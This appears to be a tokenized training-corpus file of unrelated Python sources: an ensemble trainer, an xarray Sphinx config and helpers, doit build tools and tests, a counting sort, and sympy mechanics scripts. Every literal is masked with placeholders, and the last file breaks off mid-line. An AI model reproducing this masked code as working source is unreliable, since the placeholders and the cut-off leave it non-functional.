random_state = <NUM_LIT:0> <EOL> if model_filename is not None : <EOL> joblib . dump ( model , model_filename ) <EOL> return model_filename <EOL> return model <EOL> class EnsembleGrower ( TaskManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , load_balanced_view , base_model ) : <EOL> self . tasks = [ ] <EOL> self . base_model = base_model <EOL> self . lb_view = load_balanced_view <EOL> self . _temp_files = [ ] <EOL> def reset ( self ) : <EOL> self . abort ( ) <EOL> self . tasks [ : ] = [ ] <EOL> for filename in self . _temp_files : <EOL> os . unlink ( filename ) <EOL> del self . _temp_files [ : ] <EOL> def launch ( self , X , y , sample_weight = None , n_estimators = <NUM_LIT:1> , pre_warm = True , <EOL> folder = "<STR_LIT:.>" , name = None , dump_models = False ) : <EOL> self . reset ( ) <EOL> if name is None : <EOL> name = uuid . uuid4 ( ) . get_hex ( ) <EOL> if not os . path . exists ( folder ) : <EOL> os . makedirs ( folder ) <EOL> data_filename = os . path . join ( folder , name + '<STR_LIT>' ) <EOL> data_filename = os . path . abspath ( data_filename ) <EOL> host_dump ( self . lb_view . client , ( X , y , sample_weight ) , data_filename , <EOL> pre_warm = pre_warm ) <EOL> for i in range ( n_estimators ) : <EOL> base_model = clone ( self . base_model ) <EOL> if dump_models : <EOL> model_filename = os . path . join ( <EOL> folder , name + '<STR_LIT>' % i ) <EOL> model_filename = os . path . abspath ( model_filename ) <EOL> else : <EOL> model_filename = None <EOL> self . tasks . append ( self . lb_view . apply ( <EOL> train_model , base_model , data_filename , model_filename , <EOL> random_state = i ) ) <EOL> return self <EOL> def report ( self , n_top = <NUM_LIT:5> ) : <EOL> output = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( <EOL> int ( <NUM_LIT:100> * self . progress ( ) ) , self . completed ( ) , self . total ( ) , <EOL> self . elapsed ( ) ) <EOL> return output <EOL> def __repr__ ( self ) : <EOL> return self . 
report ( ) <EOL> def aggregate_model ( self , mmap_mode = '<STR_LIT:r>' ) : <EOL> ready_models = [ ] <EOL> for task in self . completed_tasks ( ) : <EOL> result = task . get ( ) <EOL> if isinstance ( result , basestring ) : <EOL> result = joblib . load ( result , mmap_mode = mmap_mode ) <EOL> ready_models . append ( result ) <EOL> if not ready_models : <EOL> return None <EOL> return combine ( ready_models ) </s>
<s> import sys <EOL> import os <EOL> print "<STR_LIT>" , sys . executable <EOL> print "<STR_LIT>" , sys . path <EOL> try : <EOL> import numpy <EOL> print "<STR_LIT>" % ( numpy . __version__ , numpy . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import scipy <EOL> print "<STR_LIT>" % ( scipy . __version__ , scipy . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import pandas <EOL> print "<STR_LIT>" % ( pandas . __version__ , pandas . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> print "<STR_LIT>" % ( matplotlib . __version__ , matplotlib . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import IPython <EOL> print "<STR_LIT>" % ( IPython . __version__ , IPython . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> try : <EOL> import seaborn <EOL> print "<STR_LIT>" % ( seaborn . __version__ , seaborn . __file__ ) <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> import linecache <EOL> import re <EOL> from inspect import getsourcefile , getfile , getmodule , ismodule , isclass , ismethod , isfunction , istraceback , isframe , iscode <EOL> def findsource ( object ) : <EOL> """<STR_LIT>""" <EOL> file = getsourcefile ( object ) or getfile ( object ) <EOL> globals_dict = None <EOL> if inspect . isframe ( object ) : <EOL> globals_dict = object . f_globals <EOL> else : <EOL> module = getmodule ( object , file ) <EOL> if module : <EOL> globals_dict = module . __dict__ <EOL> lines = linecache . getlines ( file , globals_dict ) <EOL> if not lines : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> if ismodule ( object ) : <EOL> return lines , <NUM_LIT:0> <EOL> if isclass ( object ) : <EOL> name = object . __name__ <EOL> pat = re . compile ( r'<STR_LIT>' + name + r'<STR_LIT>' ) <EOL> candidates = [ ] <EOL> for i in range ( len ( lines ) ) : <EOL> match = pat . 
match ( lines [ i ] ) <EOL> if match : <EOL> if lines [ i ] [ <NUM_LIT:0> ] == '<STR_LIT:c>' : <EOL> return lines , i <EOL> candidates . append ( ( match . group ( <NUM_LIT:1> ) , i ) ) <EOL> if candidates : <EOL> candidates . sort ( ) <EOL> return lines , candidates [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> else : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> if ismethod ( object ) : <EOL> object = object . __func__ <EOL> if isfunction ( object ) : <EOL> object = object . __code__ <EOL> if istraceback ( object ) : <EOL> object = object . tb_frame <EOL> if isframe ( object ) : <EOL> object = object . f_code <EOL> if iscode ( object ) : <EOL> if not hasattr ( object , '<STR_LIT>' ) : <EOL> raise IOError ( '<STR_LIT>' ) <EOL> pat = re . compile ( r'<STR_LIT>' ) <EOL> pmatch = pat . match <EOL> lnum = min ( object . co_firstlineno , len ( lines ) ) - <NUM_LIT:1> <EOL> while lnum > <NUM_LIT:0> : <EOL> if pmatch ( lines [ lnum ] ) : break <EOL> lnum -= <NUM_LIT:1> <EOL> return lines , lnum <EOL> raise IOError ( '<STR_LIT>' ) <EOL> import inspect <EOL> inspect . findsource = findsource <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> extlinks = { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> autosummary_generate = True <EOL> numpydoc_class_members_toctree = True <EOL> numpydoc_show_class_members = False <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> import xarray <EOL> version = xarray . version . short_version <EOL> release = xarray . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> on_rtd = os . environ . 
get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } </s>
<s> import numpy as np <EOL> import pandas as pd <EOL> import warnings <EOL> from . pycompat import builtins , reduce <EOL> def _validate_axis ( data , axis ) : <EOL> ndim = data . ndim <EOL> if not - ndim <= axis < ndim : <EOL> raise IndexError ( '<STR_LIT>' <EOL> % ( axis , ndim , ndim ) ) <EOL> if axis < <NUM_LIT:0> : <EOL> axis += ndim <EOL> return axis <EOL> def _select_along_axis ( values , idx , axis ) : <EOL> other_ind = np . ix_ ( * [ np . arange ( s ) for s in idx . shape ] ) <EOL> sl = other_ind [ : axis ] + ( idx , ) + other_ind [ axis : ] <EOL> return values [ sl ] <EOL> def nanfirst ( values , axis ) : <EOL> axis = _validate_axis ( values , axis ) <EOL> idx_first = np . argmax ( ~ pd . isnull ( values ) , axis = axis ) <EOL> return _select_along_axis ( values , idx_first , axis ) <EOL> def nanlast ( values , axis ) : <EOL> axis = _validate_axis ( values , axis ) <EOL> rev = ( slice ( None ) , ) * axis + ( slice ( None , None , - <NUM_LIT:1> ) , ) <EOL> idx_last = - <NUM_LIT:1> - np . argmax ( ~ pd . isnull ( values ) [ rev ] , axis = axis ) <EOL> return _select_along_axis ( values , idx_last , axis ) <EOL> def _calc_concat_shape ( arrays , axis = <NUM_LIT:0> ) : <EOL> first_shape = arrays [ <NUM_LIT:0> ] . shape <EOL> length = builtins . sum ( a . shape [ axis ] for a in arrays ) <EOL> result_shape = first_shape [ : axis ] + ( length , ) + first_shape [ ( axis + <NUM_LIT:1> ) : ] <EOL> return result_shape <EOL> def interleaved_concat ( arrays , indices , axis = <NUM_LIT:0> ) : <EOL> arrays = [ np . asarray ( a ) for a in arrays ] <EOL> axis = _validate_axis ( arrays [ <NUM_LIT:0> ] , axis ) <EOL> result_shape = _calc_concat_shape ( arrays , axis = axis ) <EOL> dtype = reduce ( np . promote_types , [ a . dtype for a in arrays ] ) <EOL> result = np . empty ( result_shape , dtype ) <EOL> key = [ slice ( None ) ] * result . 
ndim <EOL> for a , ind in zip ( arrays , indices ) : <EOL> key [ axis ] = ind <EOL> result [ key ] = a <EOL> return result <EOL> def _ensure_bool_is_ndarray ( result , * args ) : <EOL> if isinstance ( result , bool ) : <EOL> shape = np . broadcast ( * args ) . shape <EOL> constructor = np . ones if result else np . zeros <EOL> result = constructor ( shape , dtype = bool ) <EOL> return result <EOL> def array_eq ( self , other ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , r'<STR_LIT>' ) <EOL> return _ensure_bool_is_ndarray ( self == other , self , other ) <EOL> def array_ne ( self , other ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . filterwarnings ( '<STR_LIT:ignore>' , r'<STR_LIT>' ) <EOL> return _ensure_bool_is_ndarray ( self != other , self , other ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as _np <EOL> from . core . variable import Variable as _Variable <EOL> from . core . dataset import Dataset as _Dataset <EOL> from . core . dataarray import DataArray as _DataArray <EOL> from . core . groupby import GroupBy as _GroupBy <EOL> from . core . pycompat import dask_array_type as _dask_array_type <EOL> from . core . ops import _dask_or_eager_func <EOL> _xarray_types = ( _Variable , _DataArray , _Dataset , _GroupBy ) <EOL> _dispatch_order = ( _np . ndarray , _dask_array_type ) + _xarray_types <EOL> def _dispatch_priority ( obj ) : <EOL> for priority , cls in enumerate ( _dispatch_order ) : <EOL> if isinstance ( obj , cls ) : <EOL> return priority <EOL> return - <NUM_LIT:1> <EOL> def _create_op ( name ) : <EOL> def func ( * args , ** kwargs ) : <EOL> new_args = args <EOL> f = _dask_or_eager_func ( name ) <EOL> if len ( args ) > <NUM_LIT:2> or len ( args ) == <NUM_LIT:0> : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( len ( args ) , name ) ) <EOL> elif len ( args ) == <NUM_LIT:1> : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , _xarray_types ) : <EOL> f = args [ <NUM_LIT:0> ] . _unary_op ( func ) <EOL> else : <EOL> p1 , p2 = map ( _dispatch_priority , args ) <EOL> if p1 >= p2 : <EOL> if isinstance ( args [ <NUM_LIT:0> ] , _xarray_types ) : <EOL> f = args [ <NUM_LIT:0> ] . _binary_op ( func ) <EOL> else : <EOL> if isinstance ( args [ <NUM_LIT:1> ] , _xarray_types ) : <EOL> f = args [ <NUM_LIT:1> ] . _binary_op ( func , reflexive = True ) <EOL> new_args = tuple ( reversed ( args ) ) <EOL> res = f ( * new_args , ** kwargs ) <EOL> if res is NotImplemented : <EOL> raise TypeError ( '<STR_LIT>' <EOL> % ( name , type ( args [ <NUM_LIT:0> ] ) , type ( args [ <NUM_LIT:1> ] ) ) ) <EOL> return res <EOL> func . __name__ = name <EOL> doc = getattr ( _np , name ) . __doc__ <EOL> func . 
__doc__ = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( name , doc ) ) <EOL> return func <EOL> __all__ = """<STR_LIT>""" . split ( ) <EOL> for name in __all__ : <EOL> globals ( ) [ name ] = _create_op ( name ) </s>
<s> from doit . tools import create_folder <EOL> BUILD_PATH = "<STR_LIT>" <EOL> def task_build ( ) : <EOL> return { '<STR_LIT>' : [ ( create_folder , [ BUILD_PATH ] ) , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" % BUILD_PATH ] <EOL> } </s>
<s> def gen_many_tasks ( ) : <EOL> yield { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> yield { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> def task_all ( ) : <EOL> yield gen_many_tasks ( ) </s>
<s> import sys <EOL> import os <EOL> import re <EOL> from . exceptions import InvalidCommand <EOL> from . action import CmdAction <EOL> from . task import Task <EOL> from . cmd_run import Run <EOL> opt_show_all = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:a>' , <EOL> '<STR_LIT>' : '<STR_LIT:all>' , <EOL> '<STR_LIT:type>' : bool , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> opt_keep_trace = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : bool , <EOL> '<STR_LIT:default>' : False , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> class Strace ( Run ) : <EOL> doc_purpose = "<STR_LIT>" <EOL> doc_usage = "<STR_LIT>" <EOL> doc_description = """<STR_LIT>""" <EOL> cmd_options = ( opt_show_all , opt_keep_trace ) <EOL> TRACE_CMD = "<STR_LIT>" <EOL> TRACE_OUT = '<STR_LIT>' <EOL> def execute ( self , params , args ) : <EOL> """<STR_LIT>""" <EOL> if os . path . exists ( self . TRACE_OUT ) : <EOL> os . unlink ( self . TRACE_OUT ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> msg = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> raise InvalidCommand ( msg ) <EOL> result = Run . execute ( self , params , args ) <EOL> if ( not params [ '<STR_LIT>' ] ) and os . path . exists ( self . TRACE_OUT ) : <EOL> os . unlink ( self . TRACE_OUT ) <EOL> return result <EOL> def _execute ( self , show_all ) : <EOL> """<STR_LIT>""" <EOL> selected = self . sel_tasks [ <NUM_LIT:0> ] <EOL> for task in self . task_list : <EOL> if task . name == selected : <EOL> self . wrap_strace ( task ) <EOL> break <EOL> report_strace = Task ( <EOL> '<STR_LIT>' , <EOL> actions = [ ( find_deps , [ self . outstream , self . TRACE_OUT , show_all ] ) ] , <EOL> verbosity = <NUM_LIT:2> , <EOL> task_dep = [ selected ] , <EOL> uptodate = [ False ] , <EOL> ) <EOL> self . task_list . append ( report_strace ) <EOL> self . sel_tasks . append ( report_strace . name ) <EOL> return Run . _execute ( self , sys . 
stdout ) <EOL> @ classmethod <EOL> def wrap_strace ( cls , task ) : <EOL> """<STR_LIT>""" <EOL> wrapped_actions = [ ] <EOL> for action in task . actions : <EOL> if isinstance ( action , CmdAction ) : <EOL> cmd = cls . TRACE_CMD % ( action . _action , cls . TRACE_OUT ) <EOL> wrapped = CmdAction ( cmd , task , save_out = action . save_out ) <EOL> wrapped_actions . append ( wrapped ) <EOL> else : <EOL> wrapped_actions . append ( action ) <EOL> task . _action_instances = wrapped_actions <EOL> task . _extend_uptodate ( [ False ] ) <EOL> def find_deps ( outstream , strace_out , show_all ) : <EOL> """<STR_LIT>""" <EOL> regex = re . compile ( r'<STR_LIT>' + <EOL> r'<STR_LIT>' ) <EOL> read = set ( ) <EOL> write = set ( ) <EOL> cwd = os . getcwd ( ) <EOL> if not os . path . exists ( strace_out ) : <EOL> return <EOL> with open ( strace_out ) as text : <EOL> for line in text : <EOL> match = regex . match ( line ) <EOL> if not match : <EOL> continue <EOL> rel_name = match . group ( '<STR_LIT:file>' ) <EOL> name = os . path . abspath ( rel_name ) <EOL> if not show_all : <EOL> if not name . startswith ( cwd ) : <EOL> continue <EOL> if '<STR_LIT>' in match . group ( '<STR_LIT>' ) : <EOL> if name not in write : <EOL> write . add ( name ) <EOL> outstream . write ( "<STR_LIT>" % name ) <EOL> else : <EOL> if name not in read : <EOL> read . add ( name ) <EOL> outstream . write ( "<STR_LIT>" % name ) </s>
<s> from io import StringIO <EOL> import pytest <EOL> from doit . exceptions import InvalidCommand <EOL> from doit . cmdparse import CmdOption <EOL> from doit . plugin import PluginDict <EOL> from doit . task import Task <EOL> from doit . cmd_base import Command , TaskLoader , DodoTaskLoader <EOL> from doit . cmd_completion import TabCompletion <EOL> from doit . cmd_help import Help <EOL> from . conftest import CmdFactory <EOL> class FakeLoader ( TaskLoader ) : <EOL> def load_tasks ( self , cmd , params , args ) : <EOL> task_list = [ <EOL> Task ( "<STR_LIT>" , None , ) , <EOL> Task ( "<STR_LIT>" , None , task_dep = [ '<STR_LIT>' ] , has_subtask = True , ) , <EOL> Task ( "<STR_LIT>" , None , is_subtask = True ) , <EOL> ] <EOL> return task_list , { } <EOL> @ pytest . fixture <EOL> def commands ( request ) : <EOL> sub_cmds = { } <EOL> sub_cmds [ '<STR_LIT>' ] = TabCompletion <EOL> sub_cmds [ '<STR_LIT>' ] = Help <EOL> return PluginDict ( sub_cmds ) <EOL> def test_invalid_shell_option ( ) : <EOL> cmd = CmdFactory ( TabCompletion ) <EOL> pytest . raises ( InvalidCommand , cmd . execute , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> class TestCmdCompletionBash ( object ) : <EOL> def test_with_dodo__dinamic_tasks ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = DodoTaskLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert '<STR_LIT>' in got <EOL> assert '<STR_LIT>' not in got <EOL> assert '<STR_LIT>' in got <EOL> def test_no_dodo__hardcoded_tasks ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = FakeLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True } , [ ] ) <EOL> got = output . 
getvalue ( ) <EOL> assert '<STR_LIT>' not in got <EOL> assert '<STR_LIT>' in got <EOL> def test_cmd_takes_file_args ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = FakeLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert """<STR_LIT>""" in got <EOL> assert """<STR_LIT>""" in got <EOL> class TestCmdCompletionZsh ( object ) : <EOL> def test_zsh_arg_line ( self ) : <EOL> opt1 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert '<STR_LIT>' == TabCompletion . _zsh_arg_line ( opt1 ) <EOL> opt2 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' } ) <EOL> assert '<STR_LIT>' == TabCompletion . _zsh_arg_line ( opt2 ) <EOL> opt3 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert '<STR_LIT>' == TabCompletion . _zsh_arg_line ( opt3 ) <EOL> opt4 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert ( '<STR_LIT>' == <EOL> TabCompletion . _zsh_arg_line ( opt4 ) ) <EOL> opt5 = CmdOption ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '<STR_LIT:s>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert ( '''<STR_LIT>''' == <EOL> TabCompletion . _zsh_arg_line ( opt5 ) ) <EOL> def test_cmd_arg_list ( self ) : <EOL> no_args = TabCompletion . 
_zsh_arg_list ( Command ( ) ) <EOL> assert "<STR_LIT>" not in no_args <EOL> assert "<STR_LIT>" not in no_args <EOL> class CmdTakeTasks ( Command ) : <EOL> doc_usage = '<STR_LIT>' <EOL> with_task_args = TabCompletion . _zsh_arg_list ( CmdTakeTasks ( ) ) <EOL> assert "<STR_LIT>" in with_task_args <EOL> assert "<STR_LIT>" not in with_task_args <EOL> class CmdTakeCommands ( Command ) : <EOL> doc_usage = '<STR_LIT>' <EOL> with_cmd_args = TabCompletion . _zsh_arg_list ( CmdTakeCommands ( ) ) <EOL> assert "<STR_LIT>" not in with_cmd_args <EOL> assert "<STR_LIT>" in with_cmd_args <EOL> def test_cmds_with_params ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = DodoTaskLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert "<STR_LIT>" in got <EOL> def test_hardcoded_tasks ( self , commands ) : <EOL> output = StringIO ( ) <EOL> cmd = CmdFactory ( TabCompletion , task_loader = FakeLoader ( ) , <EOL> outstream = output , cmds = commands ) <EOL> cmd . execute ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True } , [ ] ) <EOL> got = output . getvalue ( ) <EOL> assert '<STR_LIT>' in got </s>
<s> def counting_sort ( array , maxval ) : <EOL> """<STR_LIT>""" <EOL> count = [ <NUM_LIT:0> ] * ( maxval + <NUM_LIT:1> ) <EOL> for a in array : <EOL> count [ a ] += <NUM_LIT:1> <EOL> i = <NUM_LIT:0> <EOL> for a in range ( maxval + <NUM_LIT:1> ) : <EOL> for c in range ( count [ a ] ) : <EOL> array [ i ] = a <EOL> i += <NUM_LIT:1> <EOL> return array </s>
<s> """<STR_LIT>""" <EOL> from sympy . physics . mechanics import dynamicsymbols , MechanicsStrPrinter <EOL> from sympy . physics . mechanics import ReferenceFrame , Point <EOL> from sympy import solve , symbols <EOL> def msprint ( expr ) : <EOL> pr = MechanicsStrPrinter ( ) <EOL> return pr . doprint ( expr ) <EOL> q0 , q1 , q2 = dynamicsymbols ( '<STR_LIT>' ) <EOL> q0d , q1d , q2d = dynamicsymbols ( '<STR_LIT>' , level = <NUM_LIT:1> ) <EOL> u1 , u2 , u3 = dynamicsymbols ( '<STR_LIT>' ) <EOL> LA , LB , LP = symbols ( '<STR_LIT>' ) <EOL> p1 , p2 , p3 = symbols ( '<STR_LIT>' ) <EOL> E = ReferenceFrame ( '<STR_LIT:E>' ) <EOL> A = E . orientnew ( '<STR_LIT:A>' , '<STR_LIT>' , [ q0 , E . x ] ) <EOL> B = A . orientnew ( '<STR_LIT:B>' , '<STR_LIT>' , [ q1 , A . y ] ) <EOL> C = B . orientnew ( '<STR_LIT:C>' , '<STR_LIT>' , [ <NUM_LIT:0> , B . x ] ) <EOL> D = C . orientnew ( '<STR_LIT:D>' , '<STR_LIT>' , [ <NUM_LIT:0> , C . x ] ) <EOL> pO = Point ( '<STR_LIT:O>' ) <EOL> pAs = pO . locatenew ( '<STR_LIT>' , LA * A . z ) <EOL> pP = pO . locatenew ( '<STR_LIT:P>' , LP * A . z ) <EOL> pBs = pP . locatenew ( '<STR_LIT>' , LB * B . z ) <EOL> pCs = pBs . locatenew ( '<STR_LIT>' , q2 * B . z ) <EOL> pDs = pCs . locatenew ( '<STR_LIT>' , p1 * B . x + p2 * B . y + p3 * B . z ) <EOL> A . set_ang_vel ( E , u1 * A . x ) <EOL> B . set_ang_vel ( A , u2 * B . y ) <EOL> pCs . set_vel ( B , u3 * B . z ) <EOL> pO . set_vel ( E , <NUM_LIT:0> ) <EOL> pAs . v2pt_theory ( pO , E , A ) <EOL> pP . v2pt_theory ( pO , E , A ) <EOL> pBs . v2pt_theory ( pP , E , B ) <EOL> pCs . v1pt_theory ( pBs , E , B ) <EOL> pDs . set_vel ( B , pCs . vel ( B ) ) <EOL> pDs . v1pt_theory ( pBs , E , B ) <EOL> kinematic_eqs = [ ] <EOL> kinematic_eqs . append ( u1 - q0d ) <EOL> kinematic_eqs . append ( u2 - q1d ) <EOL> kinematic_eqs . append ( u3 - q2d ) <EOL> soln = solve ( kinematic_eqs , [ q0d , q1d , q2d ] ) <EOL> print ( "<STR_LIT>" ) <EOL> for qd in [ q0d , q1d , q2d ] : <EOL> print ( "<STR_LIT>" . 
format ( msprint ( qd ) , msprint ( soln [ qd ] ) ) ) <EOL> ang_vels = [ "<STR_LIT>" ] <EOL> ang_accs = [ "<STR_LIT>" ] <EOL> for rf in [ A , B , C , D ] : <EOL> ang_v = getattr ( rf , '<STR_LIT>' ) ( E ) <EOL> ang_a = getattr ( rf , '<STR_LIT>' ) ( E ) <EOL> express_rf = B <EOL> if rf == A : <EOL> express_rf = A <EOL> ang_vels . append ( "<STR_LIT>" . format ( <EOL> rf , E , ang_v . express ( express_rf ) ) ) <EOL> ang_accs . append ( "<STR_LIT>" . format ( <EOL> rf , E , ang_a . express ( express_rf ) ) ) <EOL> vels = [ "<STR_LIT>" ] <EOL> accs = [ "<STR_LIT>" ] <EOL> for point in [ pAs , pBs , pCs , pDs ] : <EOL> v = getattr ( point , '<STR_LIT>' ) ( E ) <EOL> a = getattr ( point , '<STR_LIT>' ) ( E ) <EOL> express_rf = B <EOL> if point == pAs : <EOL> express_rf = A <EOL> vels . append ( "<STR_LIT>" . format ( <EOL> point , E , v . express ( express_rf ) ) ) <EOL> accs . append ( "<STR_LIT>" . format ( <EOL> point , E , a . express ( express_rf ) ) ) <EOL> for results in ang_vels + ang_accs + vels + accs : <EOL> print ( results ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from sympy import diff , solve , simplify , symbols <EOL> from sympy . physics . mechanics import ReferenceFrame , Point , Particle <EOL> from sympy . physics . mechanics import dot , dynamicsymbols <EOL> from util import msprint , subs , partial_velocities <EOL> from util import generalized_active_forces , generalized_inertia_forces <EOL> g , L , m1 , m2 , omega , t = symbols ( '<STR_LIT>' ) <EOL> C , X , Y , Z = symbols ( '<STR_LIT>' ) <EOL> q1 , q2 , q3 = dynamicsymbols ( '<STR_LIT>' ) <EOL> q1d , q2d , q3d = dynamicsymbols ( '<STR_LIT>' , level = <NUM_LIT:1> ) <EOL> u1 , u2 , u3 = dynamicsymbols ( '<STR_LIT>' ) <EOL> A = ReferenceFrame ( '<STR_LIT:A>' ) <EOL> B = A . orientnew ( '<STR_LIT:B>' , '<STR_LIT>' , [ omega * t , A . y ] ) <EOL> E = B . orientnew ( '<STR_LIT:E>' , '<STR_LIT>' , [ q3 , B . z ] ) <EOL> pO = Point ( '<STR_LIT:O>' ) <EOL> pO . set_vel ( A , <NUM_LIT:0> ) <EOL> pO . set_vel ( B , <NUM_LIT:0> ) <EOL> pP1 = pO . locatenew ( '<STR_LIT>' , q1 * B . x + q2 * B . y ) <EOL> pDs = pP1 . locatenew ( '<STR_LIT>' , L * E . x ) <EOL> pP1 . set_vel ( E , <NUM_LIT:0> ) <EOL> pP1 . set_vel ( B , pP1 . pos_from ( pO ) . diff ( t , B ) ) <EOL> pP1 . v1pt_theory ( pO , A , B ) <EOL> pDs . set_vel ( E , <NUM_LIT:0> ) <EOL> pDs . v2pt_theory ( pP1 , B , E ) <EOL> pDs . v2pt_theory ( pP1 , A , E ) <EOL> u_expr = [ dot ( pP1 . vel ( A ) , E . x ) , dot ( pP1 . vel ( A ) , E . y ) , q3d ] <EOL> ulist = [ u1 , u2 , u3 ] <EOL> R1 = X * B . z + C * E . x - m1 * g * B . y <EOL> R2 = Y * E . y + Z * E . z - C * E . x - m2 * g * B . y <EOL> resultants = [ R1 , R2 ] <EOL> forces = [ ( pP1 , R1 ) , ( pDs , R2 ) ] <EOL> point_masses = [ Particle ( '<STR_LIT>' , pP1 , m1 ) , Particle ( '<STR_LIT>' , pDs , m2 ) ] <EOL> points = [ f [ <NUM_LIT:0> ] for f in forces ] <EOL> kde = [ u_i - u_ex for u_i , u_ex in zip ( ulist , u_expr ) ] <EOL> kde_map = 